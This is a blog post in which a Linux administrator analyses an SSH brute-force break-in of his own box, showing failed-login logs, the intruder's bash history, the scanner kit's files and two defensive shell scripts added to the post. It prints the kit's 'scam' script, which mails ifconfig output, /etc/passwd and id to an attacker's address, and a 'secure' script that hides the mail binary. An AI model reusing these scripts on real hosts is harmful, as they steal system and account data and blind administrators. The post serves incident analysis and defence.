Shell Person Help me keep the shell people alive.

10Apr/1042

Hacked – SSH Bruteforce

This isn't much of a surprise, as the box had an incredibly simple root password. Here's some info:

This was a brute force ssh attack. ssh root login was not disabled. Here are some of the early attempts before success:

cat /var/log/auth.log.1 | grep "Invalid user" | cut -d ':' -f 4 | sort | uniq | tail -n 25
Invalid user wilson from 64.124.102.44
Invalid user windows from 64.124.102.44
Invalid user worthy from 122.201.70.12
Invalid user www123 from 64.124.102.44
Invalid user www from 64.124.102.44
Invalid user www from 66.235.201.39
Invalid user www from 75.126.69.5
Invalid user wwwrun from 64.124.102.44
Invalid user xam from 64.124.102.44
Invalid user xbitchx from 64.124.102.44
Invalid user xchat from 64.124.102.44
Invalid user xfs123 from 64.124.102.44
Invalid user xfs from 64.124.102.44
Invalid user ydnah from 64.124.102.44
Invalid user yoshida123 from 64.124.102.44
Invalid user yoshida321 from 64.124.102.44
Invalid user yoshida from 64.124.102.44
Invalid user yssor from 64.124.102.44
Invalid user z1x2c3 from 64.124.102.44
Invalid user zabbix from 75.126.69.5
Invalid user zachary from 64.124.102.44
Invalid user zoe from 64.124.102.44
Invalid user zuperman from 64.124.102.44
Invalid user zxcvb from 64.124.102.44
Invalid user zxcvbn from 64.124.102.44

The full list is at the bottom of the post.
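
The pipeline above lists the user names that were tried but not which source eventually got in. The added example below (not from the original post) counts failures per source address and reports accepted logins that follow them, including `Failed password` lines for valid accounts such as root, which an "Invalid user" grep never shows. The function names, the threshold and the sample log lines are assumptions of the example.

```shell
#!/bin/sh
# Added example (not from the original post): find successful SSH logins that
# follow a burst of failures from the same address.

# ssh_bruteforce_hits [THRESHOLD] < auth.log
# Prints "<ip> <user> <method> <failures>" for every accepted login whose
# source address already had at least THRESHOLD (default 5) failed attempts.
ssh_bruteforce_hits() {
    awk -v min="${1:-5}" '
        # Source address = token after the LAST "from". The user name is
        # attacker-controlled text, so an earlier "from" may be forged.
        function src_ip(   i) {
            for (i = NF - 1; i >= 1; i--)
                if ($i == "from") return $(i + 1)
            return ""
        }
        / sshd\[[0-9]+\]: / {
            ip = src_ip()
            if (ip == "") next
            if ($0 ~ /\]: Invalid user /) {
                fails[ip]++
            } else if ($0 ~ /\]: Failed password for / &&
                       $0 !~ /\]: Failed password for invalid user /) {
                # Invalid users are already counted by their "Invalid user" line.
                fails[ip]++
            } else if ($0 ~ /\]: Accepted [^ ]+ for /) {
                # "Accepted <method> for <user> from <ip> port <n> ssh2"
                for (i = 1; i <= NF; i++)
                    if ($i == "Accepted") break
                if (fails[ip] + 0 >= min + 0)
                    print ip, $(i + 3), $(i + 1), fails[ip]
            }
        }
    '
}

# Constructed sample in OpenSSH syslog format. Addresses come from the
# documentation ranges and are not the ones seen in the incident.
sample_auth_log() {
    cat <<'EOF'
Apr  9 03:12:01 tv sshd[4101]: Invalid user wilson from 203.0.113.44
Apr  9 03:12:03 tv sshd[4101]: Failed password for invalid user wilson from 203.0.113.44 port 40112 ssh2
Apr  9 03:12:05 tv sshd[4103]: Invalid user www from 203.0.113.44
Apr  9 03:12:07 tv sshd[4103]: Failed password for invalid user www from 203.0.113.44 port 40120 ssh2
Apr  9 03:12:09 tv sshd[4105]: Failed password for root from 203.0.113.44 port 40131 ssh2
Apr  9 03:12:11 tv sshd[4107]: Failed password for root from 203.0.113.44 port 40140 ssh2
Apr  9 03:12:12 tv sshd[4108]: Invalid user x from 192.0.2.1 from 203.0.113.44
Apr  9 03:12:13 tv sshd[4109]: Accepted password for root from 203.0.113.44 port 40152 ssh2
Apr  9 08:30:00 tv sshd[5200]: Failed password for james from 198.51.100.7 port 51000 ssh2
Apr  9 08:30:09 tv sshd[5200]: Accepted password for james from 198.51.100.7 port 51000 ssh2
EOF
}

# Demo: only the root login preceded by five failures is reported; the single
# mistyped password from 198.51.100.7 stays below the threshold.
sample_auth_log | ssh_bruteforce_hits 5
```

On a real host, feed it the rotated logs as well, for example `cat /var/log/auth.log.1 /var/log/auth.log | ssh_bruteforce_hits 20`.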

Once root access was gained, here are the commands they left in the .bash_history:

w
history | grep mount
mount -t ext4dev -o ro /dev/hda2 /mnt/karmic/
passwd
cd /var/tmp/.tmp
;s
ls
tar zxvf gosh.tar
cd gosh
chmod +x *
screen
./go.sh 211
ifconfig eth0:1 10.30.0.8 netmask 255.255.0.0
./go.sh 211
1

Here's what I can glean from them. First he checks who else is using the system, and how long it's been idle. Then he checks my mount history and mounts another Linux partition (for Ubuntu Karmic). Then he changes my root password. I'm not sure why he did this - had he left it alone he would have had root access and I would have never known my system was compromised. Then he goes to a hidden .tmp directory and unzips gosh.tar, enters the directory, makes all files inside executable, and runs several commands. After he attempts to run go.sh, he then adds an alias for my ethernet card. I'm not sure what the purpose of this is. He then runs go.sh again. Afterwards he types "1", which is a file, but it's only a list of user names and passwords, presumably for a brute force attack. I find it notable that (1) it appears to be a person, and not a bot/script - thus the typo ";s" instead of "ls", and (2) the .bash_history was not erased. I'm not sure about the usage of "screen" - I'm assuming that screen logs commands in .bash_history, but maybe it does not. Also, I don't know if commands issued through ssh (without using a login shell) or sftp are logged in .bash_history - that would explain how gosh.tar got on my system but is not mentioned in the .bash_history.

Here's a listing of the contents of /var/tmp/.tmp/gosh:

james@tv:/var/tmp/.tmp/gosh$ ls -l
total 4796
-rwxr-xr-x 1 root root 3346659 2006-07-23 04:47 1
-rwxr-xr-x 1 root root   54703 2008-04-20 10:04 2
-rwxr-xr-x 1 root root   28956 2008-04-20 17:19 3
-rwxr-xr-x 1 root root   54703 2008-04-20 10:04 4
-rwxr-xr-x 1 root root   26857 2005-08-23 04:16 5
-rwxr-xr-x 1 root root    1287 2009-02-10 05:02 a
-rwxr-xr-x 1 root root   22354 2004-12-01 19:31 common
-rwxr-xr-x 1 root root     265 2004-11-24 19:21 gen-pass.sh
-rwxr-xr-x 1 root root      94 2008-07-25 21:46 go.sh
-rwxr-xr-x 1 root root     449 2010-03-30 14:06 mfu.txt
-rwxr-xr-x 1 root root    1743 2009-07-30 03:49 pass_file
-rwxr-xr-x 1 root root   21407 2004-07-21 16:58 pscan2
-rwxr-xr-x 1 root root    6792 2009-02-10 05:03 scam
-rwxr-xr-x 1 root root     197 2005-08-23 05:30 secure
-rwxr-xr-x 1 root root  453972 2004-07-12 13:09 ss
-rwxr-xr-x 1 root root  842736 2004-11-24 08:34 ssh-scan
-rwxr-xr-x 1 root root       0 2006-09-26 11:27 vuln.txt

Here's go.sh:

./ss 22 -a $1 -i eth0 -s 10
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan 300
rm -f bios.txt

The files "1" through "5" are all lists of user names and passwords.

I'm not sure what mfu.txt is. It's clearly a list of IP addresses, but I don't know their significance.


There are a few binaries in the gosh directory, and both "ss" and "ssh-scan" are called by "go.sh". One binary, "pscan2", appears to have a trojan.

james@tv:/var/tmp/.tmp/gosh$ clamscan .
LibClamAV Warning: ***********************************************************
LibClamAV Warning: ***  This version of the ClamAV engine is outdated.     ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
./1: OK
./2: OK
./3: OK
./4: OK
./5: OK
./a: OK
./ss: OK
./scam: OK
./go.sh: OK
./pass_file: OK
./mfu.txt: OK
./common: OK
./ssh-scan: OK
./pscan2: Trojan.Linux.RST.b FOUND
./gen-pass.sh: OK
./secure: OK
./vuln.txt: Empty file

----------- SCAN SUMMARY -----------
Known viruses: 754683
Engine version: 0.95.3
Scanned directories: 1
Scanned files: 16
Infected files: 1
Data scanned: 7.73 MB
Data read: 4.62 MB (ratio 1.67:1)
Time: 2.999 sec (0 m 2 s)

One script, "scam", sends mail to the address "mafia89tm@yahoo.com". I'm not sure if this script was ever called. Here's part of it (it's long, and repetitive). Unfortunately, with the current formatting of this blog you lose the rad ASCII art, so I've included it here.

#!/bin/bash

echo "[+] [+] [+] RK [+] [+] [+]" >> info2
echo "[+] [+] [+] IP [+] [+] [+]" >> info2
/sbin/ifconfig -a >> info2
echo "[+] [+] [+] uptime [+] [+] [+]" >> info2
uptime >> info2
echo "[+] [+] [+] uname -a [+] [+] [+]" >> info2
uname -a >> info2
echo "[+] [+] [+] /etc/issue [+] [+] [+]" >> info2
cat /etc/issue >> info2
echo "[+] [+] [+] passwd [+] [+] [+]" >> info2
cat /etc/passwd >> info2
echo "[+] [+] [+] id [+] [+] [+]" >> info2
id >> info2
echo "[+] [+] [+] Spatiu Hdd / pwd [+] [+] [+]" >> info2
df -h >> info2
pwd >> info2
cat info2 | mail -s "Scanner MaLa Port : ?? | Pass : stii tu :) )" mafia89tm@yahoo.com
rm -rf info2
clear

echo "####################################################################"
echo "#	                      ______                                  "
echo "# 	                   .-.      .-.                               "
echo "# 	                  /            \                              "
echo "# 	                 |     zRR      |                             "
echo "# 	                 |,  .-.  .-.  ,|                             "
echo "# 	                 | )(z_/  \z_)( |                             "
echo "# 	                 |/     /\     \|                             "
echo "# 	         _       (_     ^^     _)                             "
echo "# 	 _\ ____) \_______\__|IIIIII|__/_________________________     "
echo "# 	(_)[___]{}<________|-\IIIIII/-|__zRR__zRR__zRR___________\    "
echo "# 	  /     )_/        \          /                               "
echo "# 	                    \ ______ /  		                    "
echo "#                         SCANER PRIVAT                             "
echo "#             SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe               "
echo "#            SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !!              "
echo "####################################################################"

if [ -f a ]; then
cat vuln.txt |mail -s "Lame Gang Us Roots" mafia89tm@yahoo.com
./a $1.0
./a $1.1
./a $1.2
./a $1.3
./a $1.4
./a $1.5
./a $1.6
./a $1.7
./a $1.8
./a $1.9
./a $1.10
cat vuln.txt |mail -s "Lame Gang Us Roots" mafia89tm@yahoo.com
./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16

Another script, "secure", appears to rename /usr/bin/mail. I assume this is to prevent alerting the administrator, but I'm not sure. I don't know if this script was ever called. Here it is.

#!/bin/bash
if [ `whoami` == "root" ]; then
chmod -x /usr/bin/mail
mv /usr/bin/mail /usr/bin/s8
echo " Done , You can scan now "
else
echo -e " you're not root you're `whoami` with id `id` !! "
fi

I also noticed the existence of a new authorized_keys file in "/root/.ssh". I'm assuming this would give password-less login via ssh.

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIB8NTwrTVNx8KZwzNj067GiIfz8Vc2DgqvmEatkwH1hjiM/jdrq2VFEAJI75AIdarHo1jVL7ZcpsmiIJQ3Pi+P0JdAXARK8PJEZyRQJLJusucbJeU9FI4drnPceKKthaSjVl/9bWa6ckmrYaFIfnNZtAH9CAWn6TCGb5lDfKdgC5Q== awsnext
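
The artefacts described in this post (an unexpected key in root's authorized_keys, the mail binary moved to /usr/bin/s8 by "secure", and a hidden directory under /var/tmp) can be checked in one pass, ideally against a read-only mount of the disk rather than the running system. This is an added example, not part of the original post; the function names, the allowlist file of known key blobs and the fixture contents are assumptions of the example.

```shell
#!/bin/sh
# Added example (not from the original post): sweep a filesystem tree for the
# artefacts this post describes. Function names and the allowlist file are
# assumptions of the example.

# sweep_host ROOT [KNOWN_KEYS]
#   ROOT        "/" on a live host, or the mount point of a read-only image
#   KNOWN_KEYS  file of base64 key blobs you expect, one per line
# Prints one "FINDING: ..." line per hit.
sweep_host() {
    root=${1%/}
    known=${2:-/dev/null}

    # 1. Every key in root's authorized_keys grants password-less root login.
    ak="$root/root/.ssh/authorized_keys"
    if [ -f "$ak" ]; then
        awk -v known="$known" '
            BEGIN { while ((getline line < known) > 0) ok[line] = 1 }
            NF == 0 || /^[ \t]*#/ { next }
            {
                # Skip any leading options field to reach "<type> <blob>".
                for (i = 1; i < NF; i++)
                    if ($i ~ /^(ssh-|ecdsa-|sk-)/) break
                if (i >= NF || ($(i + 1) in ok)) next
                print "FINDING: unrecognised root key, type=" $i \
                      " comment=" (i + 2 <= NF ? $(i + 2) : "(none)")
            }
        ' "$ak"
    fi

    # 2. The "secure" script strips the execute bit from mail and moves it to s8.
    if [ -e "$root/usr/bin/s8" ]; then
        echo "FINDING: /usr/bin/s8 exists"
    fi
    if [ -f "$root/usr/bin/mail" ] && [ ! -x "$root/usr/bin/mail" ]; then
        echo "FINDING: /usr/bin/mail is present but not executable"
    fi

    # 3. Hidden directories under /var/tmp, such as /var/tmp/.tmp here.
    if [ -d "$root/var/tmp" ]; then
        find "$root/var/tmp" -mindepth 1 -maxdepth 2 -type d -name '.*' |
        while IFS= read -r dir; do
            n=$(find "$dir" -type f -perm -100 | wc -l | tr -d ' ')
            echo "FINDING: hidden directory ${dir#"$root"} with $n executable file(s)"
        done
    fi
    return 0
}

# Constructed fixture reproducing the post's artefacts; key blobs are fake.
build_fixture() {
    mkdir -p "$1/root/.ssh" "$1/usr/bin" "$1/var/tmp/.tmp/gosh"
    printf '%s\n' 'ssh-rsa AAAAKNOWNKEY admin@laptop' \
                  'ssh-rsa AAAAUNKNOWNKEY awsnext' > "$1/root/.ssh/authorized_keys"
    printf '%s\n' 'AAAAKNOWNKEY' > "$1/known_keys"
    : > "$1/usr/bin/s8"
    : > "$1/var/tmp/.tmp/gosh/go.sh"
    chmod 755 "$1/var/tmp/.tmp/gosh/go.sh"
}

# Demo: three findings (unknown key, s8, hidden directory); the known key is
# not reported.
fixture=$(mktemp -d) && build_fixture "$fixture" &&
    sweep_host "$fixture" "$fixture/known_keys"
rm -rf "$fixture"
```

Without a KNOWN_KEYS file every key in the file is reported, which is the safe default when no record of legitimate keys exists.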

Please feel free to add your own insight into this attack, or if you've experienced the same thing.

This is the full list of attempted brute force ssh attacks, before they gained access. (Click "show source" below to see the list - it was way too long and made commenting annoying).

 Invalid user mikey from 64.124.102.44
 Invalid user mini from 122.201.70.12
 Invalid user miro from 64.124.102.44
 Invalid user modesto123 from 64.124.102.44
 Invalid user modesto321 from 64.124.102.44
 Invalid user modesto from 64.124.102.44
 Invalid user Monday44 from 64.124.102.44
 Invalid user Monday from 64.124.102.44
 Invalid user montreal from 64.124.102.44
 Invalid user morris from 64.124.102.44
 Invalid user morthy from 122.201.70.12
 Invalid user MOTOS from 64.124.102.44
 Invalid user mp3123 from 64.124.102.44
 Invalid user mp3 from 64.124.102.44
 Invalid user mp3mp3 from 64.124.102.44
 Invalid user mrtg123 from 64.124.102.44
 Invalid user mrtg1 from 64.124.102.44
 Invalid user mrtg2 from 64.124.102.44
 Invalid user mrtg3 from 64.124.102.44
 Invalid user mrtg from 64.124.102.44
 Invalid user music from 64.124.102.44
 Invalid user musiq from 64.124.102.44
 Invalid user musli from 122.201.70.12
 Invalid user mysql123 from 64.124.102.44
 Invalid user mysql from 64.124.102.44
 Invalid user mysql from 66.235.201.39
 Invalid user mysql from 75.126.69.5
 Invalid user nagios from 75.126.69.5
 Invalid user named from 64.124.102.44
 Invalid user name from 64.124.102.44
 Invalid user nameuser from 64.124.102.44
 Invalid user naric from 64.124.102.44
 Invalid user natalia from 64.124.102.44
 Invalid user nathan123 from 64.124.102.44
 Invalid user news123 from 64.124.102.44
 Invalid user newsnews from 64.124.102.44
 Invalid user nic from 64.124.102.44
 Invalid user nicholas from 64.124.102.44
 Invalid user nicole123 from 64.124.102.44
 Invalid user nicole321 from 64.124.102.44
 Invalid user nicole from 64.124.102.44
 Invalid user nina123 from 64.124.102.44
 Invalid user nina from 64.124.102.44
 Invalid user ninanina from 64.124.102.44
 Invalid user nistor from 64.124.102.44
 Invalid user nitro from 64.124.102.44
 Invalid user nobody123 from 64.124.102.44
 Invalid user nord from 122.201.70.12
 Invalid user novos from 64.124.102.44
 Invalid user nozama from 64.124.102.44
 Invalid user nsuser from 64.124.102.44
 Invalid user ntp123 from 64.124.102.44
 Invalid user ntp from 64.124.102.44
 Invalid user null from 64.124.102.44
 Invalid user nullmail from 64.124.102.44
 Invalid user ocean\tocean from 64.124.102.44
 Invalid user office from 64.124.102.44
 Invalid user oficina from 64.124.102.44
 Invalid user ofni from 64.124.102.44
 Invalid user ogam from 64.124.102.44
 Invalid user oinstall from 64.124.102.44
 Invalid user olga from 64.124.102.44
 Invalid user oliver from 64.124.102.44
 Invalid user olivier from 64.124.102.44
 Invalid user omni from 75.126.69.5
 Invalid user operator from 64.124.102.44
 Invalid user oracle123 from 64.124.102.44
 Invalid user oracle from 64.124.102.44
 Invalid user oracle from 75.126.69.5
 Invalid user order from 64.124.102.44
 Invalid user pam from 64.124.102.44
 Invalid user paolo from 64.124.102.44
 Invalid user paredes123 from 64.124.102.44
 Invalid user paredes321 from 64.124.102.44
 Invalid user paredes from 64.124.102.44
 Invalid user passwd from 64.124.102.44
 Invalid user password from 64.124.102.44
 Invalid user pasword from 64.124.102.44
 Invalid user patrick123 from 64.124.102.44
 Invalid user patrick321 from 64.124.102.44
 Invalid user patrick from 64.124.102.44
 Invalid user paul123 from 64.124.102.44
 Invalid user paul321 from 64.124.102.44
 Invalid user paula from 64.124.102.44
 Invalid user paul from 64.124.102.44
 Invalid user paulo from 64.124.102.44
 Invalid user pay from 64.124.102.44
 Invalid user paymaster from 64.124.102.44
 Invalid user payment from 64.124.102.44
 Invalid user payments from 64.124.102.44
 Invalid user paypal from 64.124.102.44
 Invalid user pcesar from 64.124.102.44
 Invalid user pecas from 64.124.102.44
 Invalid user peggy\tpeggy from 64.124.102.44
 Invalid user pessoal from 64.124.102.44
 Invalid user pgomes from 64.124.102.44
 Invalid user pgsql123 from 64.124.102.44
 Invalid user pgsql from 64.124.102.44
 Invalid user philipe from 64.124.102.44
 Invalid user pics from 64.124.102.44
 Invalid user plant from 213.197.182.48
 Invalid user plasma from 213.197.182.48
 Invalid user plcmspip from 75.126.69.5
 Invalid user PlcmSpIp from 75.126.69.5
 Invalid user plesk-root from 62.149.203.228
 Invalid user plokm from 64.124.102.44
 Invalid user pmok from 64.124.102.44
 Invalid user polycom from 75.126.69.5
 Invalid user poq from 64.124.102.44
 Invalid user postfix from 64.124.102.44
 Invalid user postfix from 75.126.69.5
 Invalid user post from 64.124.102.44
 Invalid user postgres from 64.124.102.44
 Invalid user PostgreSQL from 64.124.102.44
 Invalid user postmaster123 from 64.124.102.44
 Invalid user postmaster321 from 64.124.102.44
 Invalid user postmaster from 64.124.102.44
 Invalid user power from 64.124.102.44
 Invalid user powers from 64.124.102.44
 Invalid user printer from 64.124.102.44
 Invalid user prueba from 64.124.102.44
 Invalid user pussycat from 64.124.102.44
 Invalid user pussy from 64.124.102.44
 Invalid user pyramid from 64.124.102.44
 Invalid user pysco123 from 64.124.102.44
 Invalid user pysco from 64.124.102.44
 Invalid user q1w2e3r4 from 64.124.102.44
 Invalid user q1w2e3r4t5 from 64.124.102.44
 Invalid user q1w2e3r4t5y6 from 64.124.102.44
 Invalid user qaz from 64.124.102.44
 Invalid user qazxsw from 64.124.102.44
 Invalid user qpalzm from 64.124.102.44
 Invalid user qpwoeiru from 64.124.102.44
 Invalid user queen from 64.124.102.44
 Invalid user qwer1234 from 64.124.102.44
 Invalid user qwer from 64.124.102.44
 Invalid user qwert from 64.124.102.44
 Invalid user qwerty from 64.124.102.44
 Invalid user qwpoeriuty from 64.124.102.44
 Invalid user r00t123 from 64.124.102.44
 Invalid user r00t from 64.124.102.44
 Invalid user r0x1ng from 64.124.102.44
 Invalid user rachafi123 from 64.124.102.44
 Invalid user rachafi321 from 64.124.102.44
 Invalid user rachafi from 64.124.102.44
 Invalid user radio from 64.124.102.44
 Invalid user radmin from 75.126.69.5
 Invalid user rafael from 64.124.102.44
 Invalid user raisa from 64.124.102.44
 Invalid user rauleli from 64.124.102.44
 Invalid user raul from 64.124.102.44
 Invalid user ray from 64.124.102.44
 Invalid user rcp from 64.124.102.44
 Invalid user rebeca from 64.124.102.44
 Invalid user recepcao from 64.124.102.44
 Invalid user redhat from 64.124.102.44
 Invalid user regina from 64.124.102.44
 Invalid user remus from 64.124.102.44
 Invalid user reseller01 from 64.124.102.44
 Invalid user reseller02 from 64.124.102.44
 Invalid user reseller from 64.124.102.44
 Invalid user rewt from 64.124.102.44
 Invalid user richard123 from 64.124.102.44
 Invalid user richard321 from 64.124.102.44
 Invalid user richard from 64.124.102.44
 Invalid user riche from 64.124.102.44
 Invalid user rich from 64.124.102.44
 Invalid user ricky123 from 64.124.102.44
 Invalid user ricky321 from 64.124.102.44
 Invalid user ricky from 64.124.102.44
 Invalid user rita from 64.124.102.44
 Invalid user ro0tTri!10biteS from 64.124.102.44
 Invalid user robert from 64.124.102.44
 Invalid user rocco from 122.201.70.12
 Invalid user rocket from 64.124.102.44
 Invalid user rock from 64.124.102.44
 Invalid user rocky from 122.201.70.12
 Invalid user roco from 122.201.70.12
 Invalid user roger from 64.124.102.44
 Invalid user romeo from 64.124.102.44
 Invalid user ron123 from 64.124.102.44
 Invalid user ronald123 from 64.124.102.44
 Invalid user ronald from 64.124.102.44
 Invalid user root123456 from 64.124.102.44
 Invalid user root12345 from 64.124.102.44
 Invalid user root1234 from 64.124.102.44
 Invalid user root123 from 64.124.102.44
 Invalid user root321 from 64.124.102.44
 Invalid user rooter from 64.124.102.44
 Invalid user rootest from 64.124.102.44
 Invalid user ROOT from 64.124.102.44
 Invalid user rossy123 from 64.124.102.44
 Invalid user rossy321 from 64.124.102.44
 Invalid user rossy from 64.124.102.44
 Invalid user rossyrossy from 64.124.102.44
 Invalid user rotciv from 64.124.102.44
 Invalid user router from 64.124.102.44
 Invalid user roza from 64.124.102.44
 Invalid user rpcuser123 from 64.124.102.44
 Invalid user rpcuser from 64.124.102.44
 Invalid user rpm123 from 64.124.102.44
 Invalid user rpm from 64.124.102.44
 Invalid user rpmrpm from 64.124.102.44
 Invalid user rudolf from 64.124.102.44
 Invalid user ryan123 from 64.124.102.44
 Invalid user ryan from 64.124.102.44
 Invalid user saito from 213.197.182.48
 Invalid user sale from 64.124.102.44
 Invalid user sales123 from 64.124.102.44
 Invalid user sales321 from 64.124.102.44
 Invalid user sales from 64.124.102.44
 Invalid user sandra123 from 64.124.102.44
 Invalid user sandra321 from 64.124.102.44
 Invalid user sandra from 64.124.102.44
 Invalid user sara123 from 64.124.102.44
 Invalid user sara321 from 64.124.102.44
 Invalid user sara from 64.124.102.44
 Invalid user sarah from 64.124.102.44
 Invalid user sarasara from 64.124.102.44
 Invalid user schimitt from 64.124.102.44
 Invalid user school123 from 64.124.102.44
 Invalid user school from 64.124.102.44
 Invalid user script123 from 64.124.102.44
 Invalid user script from 64.124.102.44
 Invalid user scriptscript from 64.124.102.44
 Invalid user secret from 64.124.102.44
 Invalid user secrets from 64.124.102.44
 Invalid user secure from 64.124.102.44
 Invalid user selena from 64.124.102.44
 Invalid user semp from 122.201.70.12
 Invalid user sergio from 64.124.102.44
 Invalid user server123 from 64.124.102.44
 Invalid user server from 64.124.102.44
 Invalid user service from 75.126.69.5
 Invalid user sex from 64.124.102.44
 Invalid user sharon from 64.124.102.44
 Invalid user shell from 75.126.69.5
 Invalid user shop123 from 64.124.102.44
 Invalid user shop from 64.124.102.44
 Invalid user shopping from 64.124.102.44
 Invalid user shutdown123 from 64.124.102.44
 Invalid user shutdown from 64.124.102.44
 Invalid user shutdownshutdown from 64.124.102.44
 Invalid user silvia from 64.124.102.44
 Invalid user simon123 from 64.124.102.44
 Invalid user simon321 from 64.124.102.44
 Invalid user simon from 122.201.70.12
 Invalid user simon from 64.124.102.44
 Invalid user simpleit from 122.201.70.12
 Invalid user simpson from 64.124.102.44
 Invalid user sistem from 64.124.102.44
 Invalid user smchoi from 64.124.102.44
 Invalid user smith from 64.124.102.44
 Invalid user sophie from 64.124.102.44
 Invalid user spain from 64.124.102.44
 Invalid user spress from 64.124.102.44
 Invalid user sql123 from 64.124.102.44
 Invalid user sql from 64.124.102.44
 Invalid user sqlmy from 64.124.102.44
 Invalid user sqlpostgres from 64.124.102.44
 Invalid user sqlsql from 64.124.102.44
 Invalid user stephen123 from 64.124.102.44
 Invalid user stephen321 from 64.124.102.44
 Invalid user stephen from 64.124.102.44
 Invalid user steve from 64.124.102.44
 Invalid user steven123 from 64.124.102.44
 Invalid user steven321 from 64.124.102.44
 Invalid user steven from 64.124.102.44
 Invalid user stewart from 64.124.102.44
 Invalid user stims1 from 64.124.102.44
 Invalid user stims\tstims from 64.124.102.44
 Invalid user student from 64.124.102.44
 Invalid user sunday from 64.124.102.44
 Invalid user Sunday from 64.124.102.44
 Invalid user suva123 from 64.124.102.44
 Invalid user suva321 from 64.124.102.44
 Invalid user suva from 64.124.102.44
 Invalid user suzana from 64.124.102.44
 Invalid user suzuki from 75.126.69.5
 Invalid user svn from 75.126.69.5
 Invalid user swen from 64.124.102.44
 Invalid user sync123 from 64.124.102.44
 Invalid user system123 from 64.124.102.44
 Invalid user system321 from 64.124.102.44
 Invalid user system from 64.124.102.44
 Invalid user takayama123 from 64.124.102.44
 Invalid user takayama321 from 64.124.102.44
 Invalid user takayama from 64.124.102.44
 Invalid user tanaka123 from 64.124.102.44
 Invalid user tanaka from 64.124.102.44
 Invalid user tanakatanaka from 64.124.102.44
 Invalid user teamspeak from 75.126.69.5
 Invalid user TeamSpeak from 75.126.69.5
 Invalid user tech123 from 64.124.102.44
 Invalid user tech from 64.124.102.44
 Invalid user techtech123 from 64.124.102.44
 Invalid user techtech from 64.124.102.44
 Invalid user telmo from 64.124.102.44
 Invalid user temp from 64.124.102.44
 Invalid user temp from 75.126.69.5
 Invalid user ten from 122.201.70.12
 Invalid user test12345 from 64.124.102.44
 Invalid user test123 from 64.124.102.44
 Invalid user test1 from 122.201.70.12
 Invalid user test1 from 64.124.102.44
 Invalid user test1test1 from 64.124.102.44
 Invalid user test2 from 122.201.70.12
 Invalid user test2 from 64.124.102.44
 Invalid user test2res from 64.124.102.44
 Invalid user test3 from 64.124.102.44
 Invalid user test4 from 64.124.102.44
 Invalid user test5 from 64.124.102.44
 Invalid user test6 from 64.124.102.44
 Invalid user test7 from 64.124.102.44
 Invalid user test8 from 64.124.102.44
 Invalid user test9 from 64.124.102.44
 Invalid user tester from 64.124.102.44
 Invalid user testertester from 64.124.102.44
 Invalid user testest from 64.124.102.44
 Invalid user test from 122.201.70.12
 Invalid user test from 64.124.102.44
 Invalid user test from 75.126.69.5
 Invalid user testing from 64.124.102.44
 Invalid user testmail from 64.124.102.44
 Invalid user testrese from 64.124.102.44
 Invalid user testroot from 64.124.102.44
 Invalid user testtest123 from 64.124.102.44
 Invalid user testtest from 64.124.102.44
 Invalid user testuser from 64.124.102.44
 Invalid user testuser from 75.126.69.5
 Invalid user theo123 from 64.124.102.44
 Invalid user theo from 64.124.102.44
 Invalid user thomas123 from 64.124.102.44
 Invalid user thomas321 from 64.124.102.44
 Invalid user thomas from 122.201.70.12
 Invalid user thomas from 64.124.102.44
 Invalid user tia123 from 64.124.102.44
 Invalid user tia321 from 64.124.102.44
 Invalid user tia from 64.124.102.44
 Invalid user tiatia from 64.124.102.44
 Invalid user tigerclaw from 64.124.102.44
 Invalid user tmp1 from 64.124.102.44
 Invalid user tomcat123 from 64.124.102.44
 Invalid user tomcat4 from 64.124.102.44
 Invalid user tomcat from 64.124.102.44
 Invalid user tom from 64.124.102.44
 Invalid user tom from 75.126.69.5
 Invalid user toor from 122.201.70.12
 Invalid user tracy from 61.133.208.210
 Invalid user travel from 64.124.102.44
 Invalid user trial from 64.124.102.44
 Invalid user ts from 75.126.69.5
 Invalid user tyler\ttyler from 64.124.102.44
 Invalid user ueda from 213.197.182.48
 Invalid user universal from 64.124.102.44
 Invalid user unix from 75.126.69.5
 Invalid user unreal from 64.124.102.44
 Invalid user upload123 from 64.124.102.44
 Invalid user upload321 from 64.124.102.44
 Invalid user upload from 64.124.102.44
 Invalid user usa from 64.124.102.44
 Invalid user user01 from 64.124.102.44
 Invalid user user02 from 64.124.102.44
 Invalid user user1 from 64.124.102.44
 Invalid user user2 from 64.124.102.44
 Invalid user user3 from 64.124.102.44
 Invalid user user4 from 64.124.102.44
 Invalid user user5 from 64.124.102.44
 Invalid user user from 64.124.102.44
 Invalid user user from 75.126.69.5
 Invalid user username123 from 64.124.102.44
 Invalid user username321 from 64.124.102.44
 Invalid user username from 64.124.102.44
 Invalid user usertest from 64.124.102.44
 Invalid user usr from 64.124.102.44
 Invalid user uucp123 from 64.124.102.44
 Invalid user uucpuucp from 64.124.102.44
 Invalid user valentin from 64.124.102.44
 Invalid user vamalc from 64.124.102.44
 Invalid user vanessa123 from 64.124.102.44
 Invalid user vanessa321 from 64.124.102.44
 Invalid user vanessa from 64.124.102.44
 Invalid user var from 64.124.102.44
 Invalid user vcsa123 from 64.124.102.44
 Invalid user vcsa from 64.124.102.44
 Invalid user vendas from 64.124.102.44
 Invalid user ventas from 64.124.102.44
 Invalid user vera from 64.124.102.44
 Invalid user vicar from 122.201.70.12
 Invalid user victor123 from 64.124.102.44
 Invalid user victor321 from 64.124.102.44
 Invalid user victor from 64.124.102.44
 Invalid user video from 64.124.102.44
 Invalid user violeta from 64.124.102.44
 Invalid user virtuoso123 from 64.124.102.44
 Invalid user virtuoso321 from 64.124.102.44
 Invalid user virtuoso from 64.124.102.44
 Invalid user virusalert from 75.126.69.5
 Invalid user vivian123 from 64.124.102.44
 Invalid user vivian321 from 64.124.102.44
 Invalid user vivian from 64.124.102.44
 Invalid user vivi from 64.124.102.44
 Invalid user vox from 64.124.102.44
 Invalid user walter from 64.124.102.44
 Invalid user wayne\twayne from 64.124.102.44
 Invalid user web1 from 64.124.102.44
 Invalid user web2 from 64.124.102.44
 Invalid user webadmin123 from 64.124.102.44
 Invalid user webadmin321 from 64.124.102.44
 Invalid user webadmin from 64.124.102.44
 Invalid user webadmin from 75.126.69.5
 Invalid user webchat from 64.124.102.44
 Invalid user webdesign from 64.124.102.44
 Invalid user webdev from 64.124.102.44
 Invalid user web from 64.124.102.44
 Invalid user webhost from 64.124.102.44
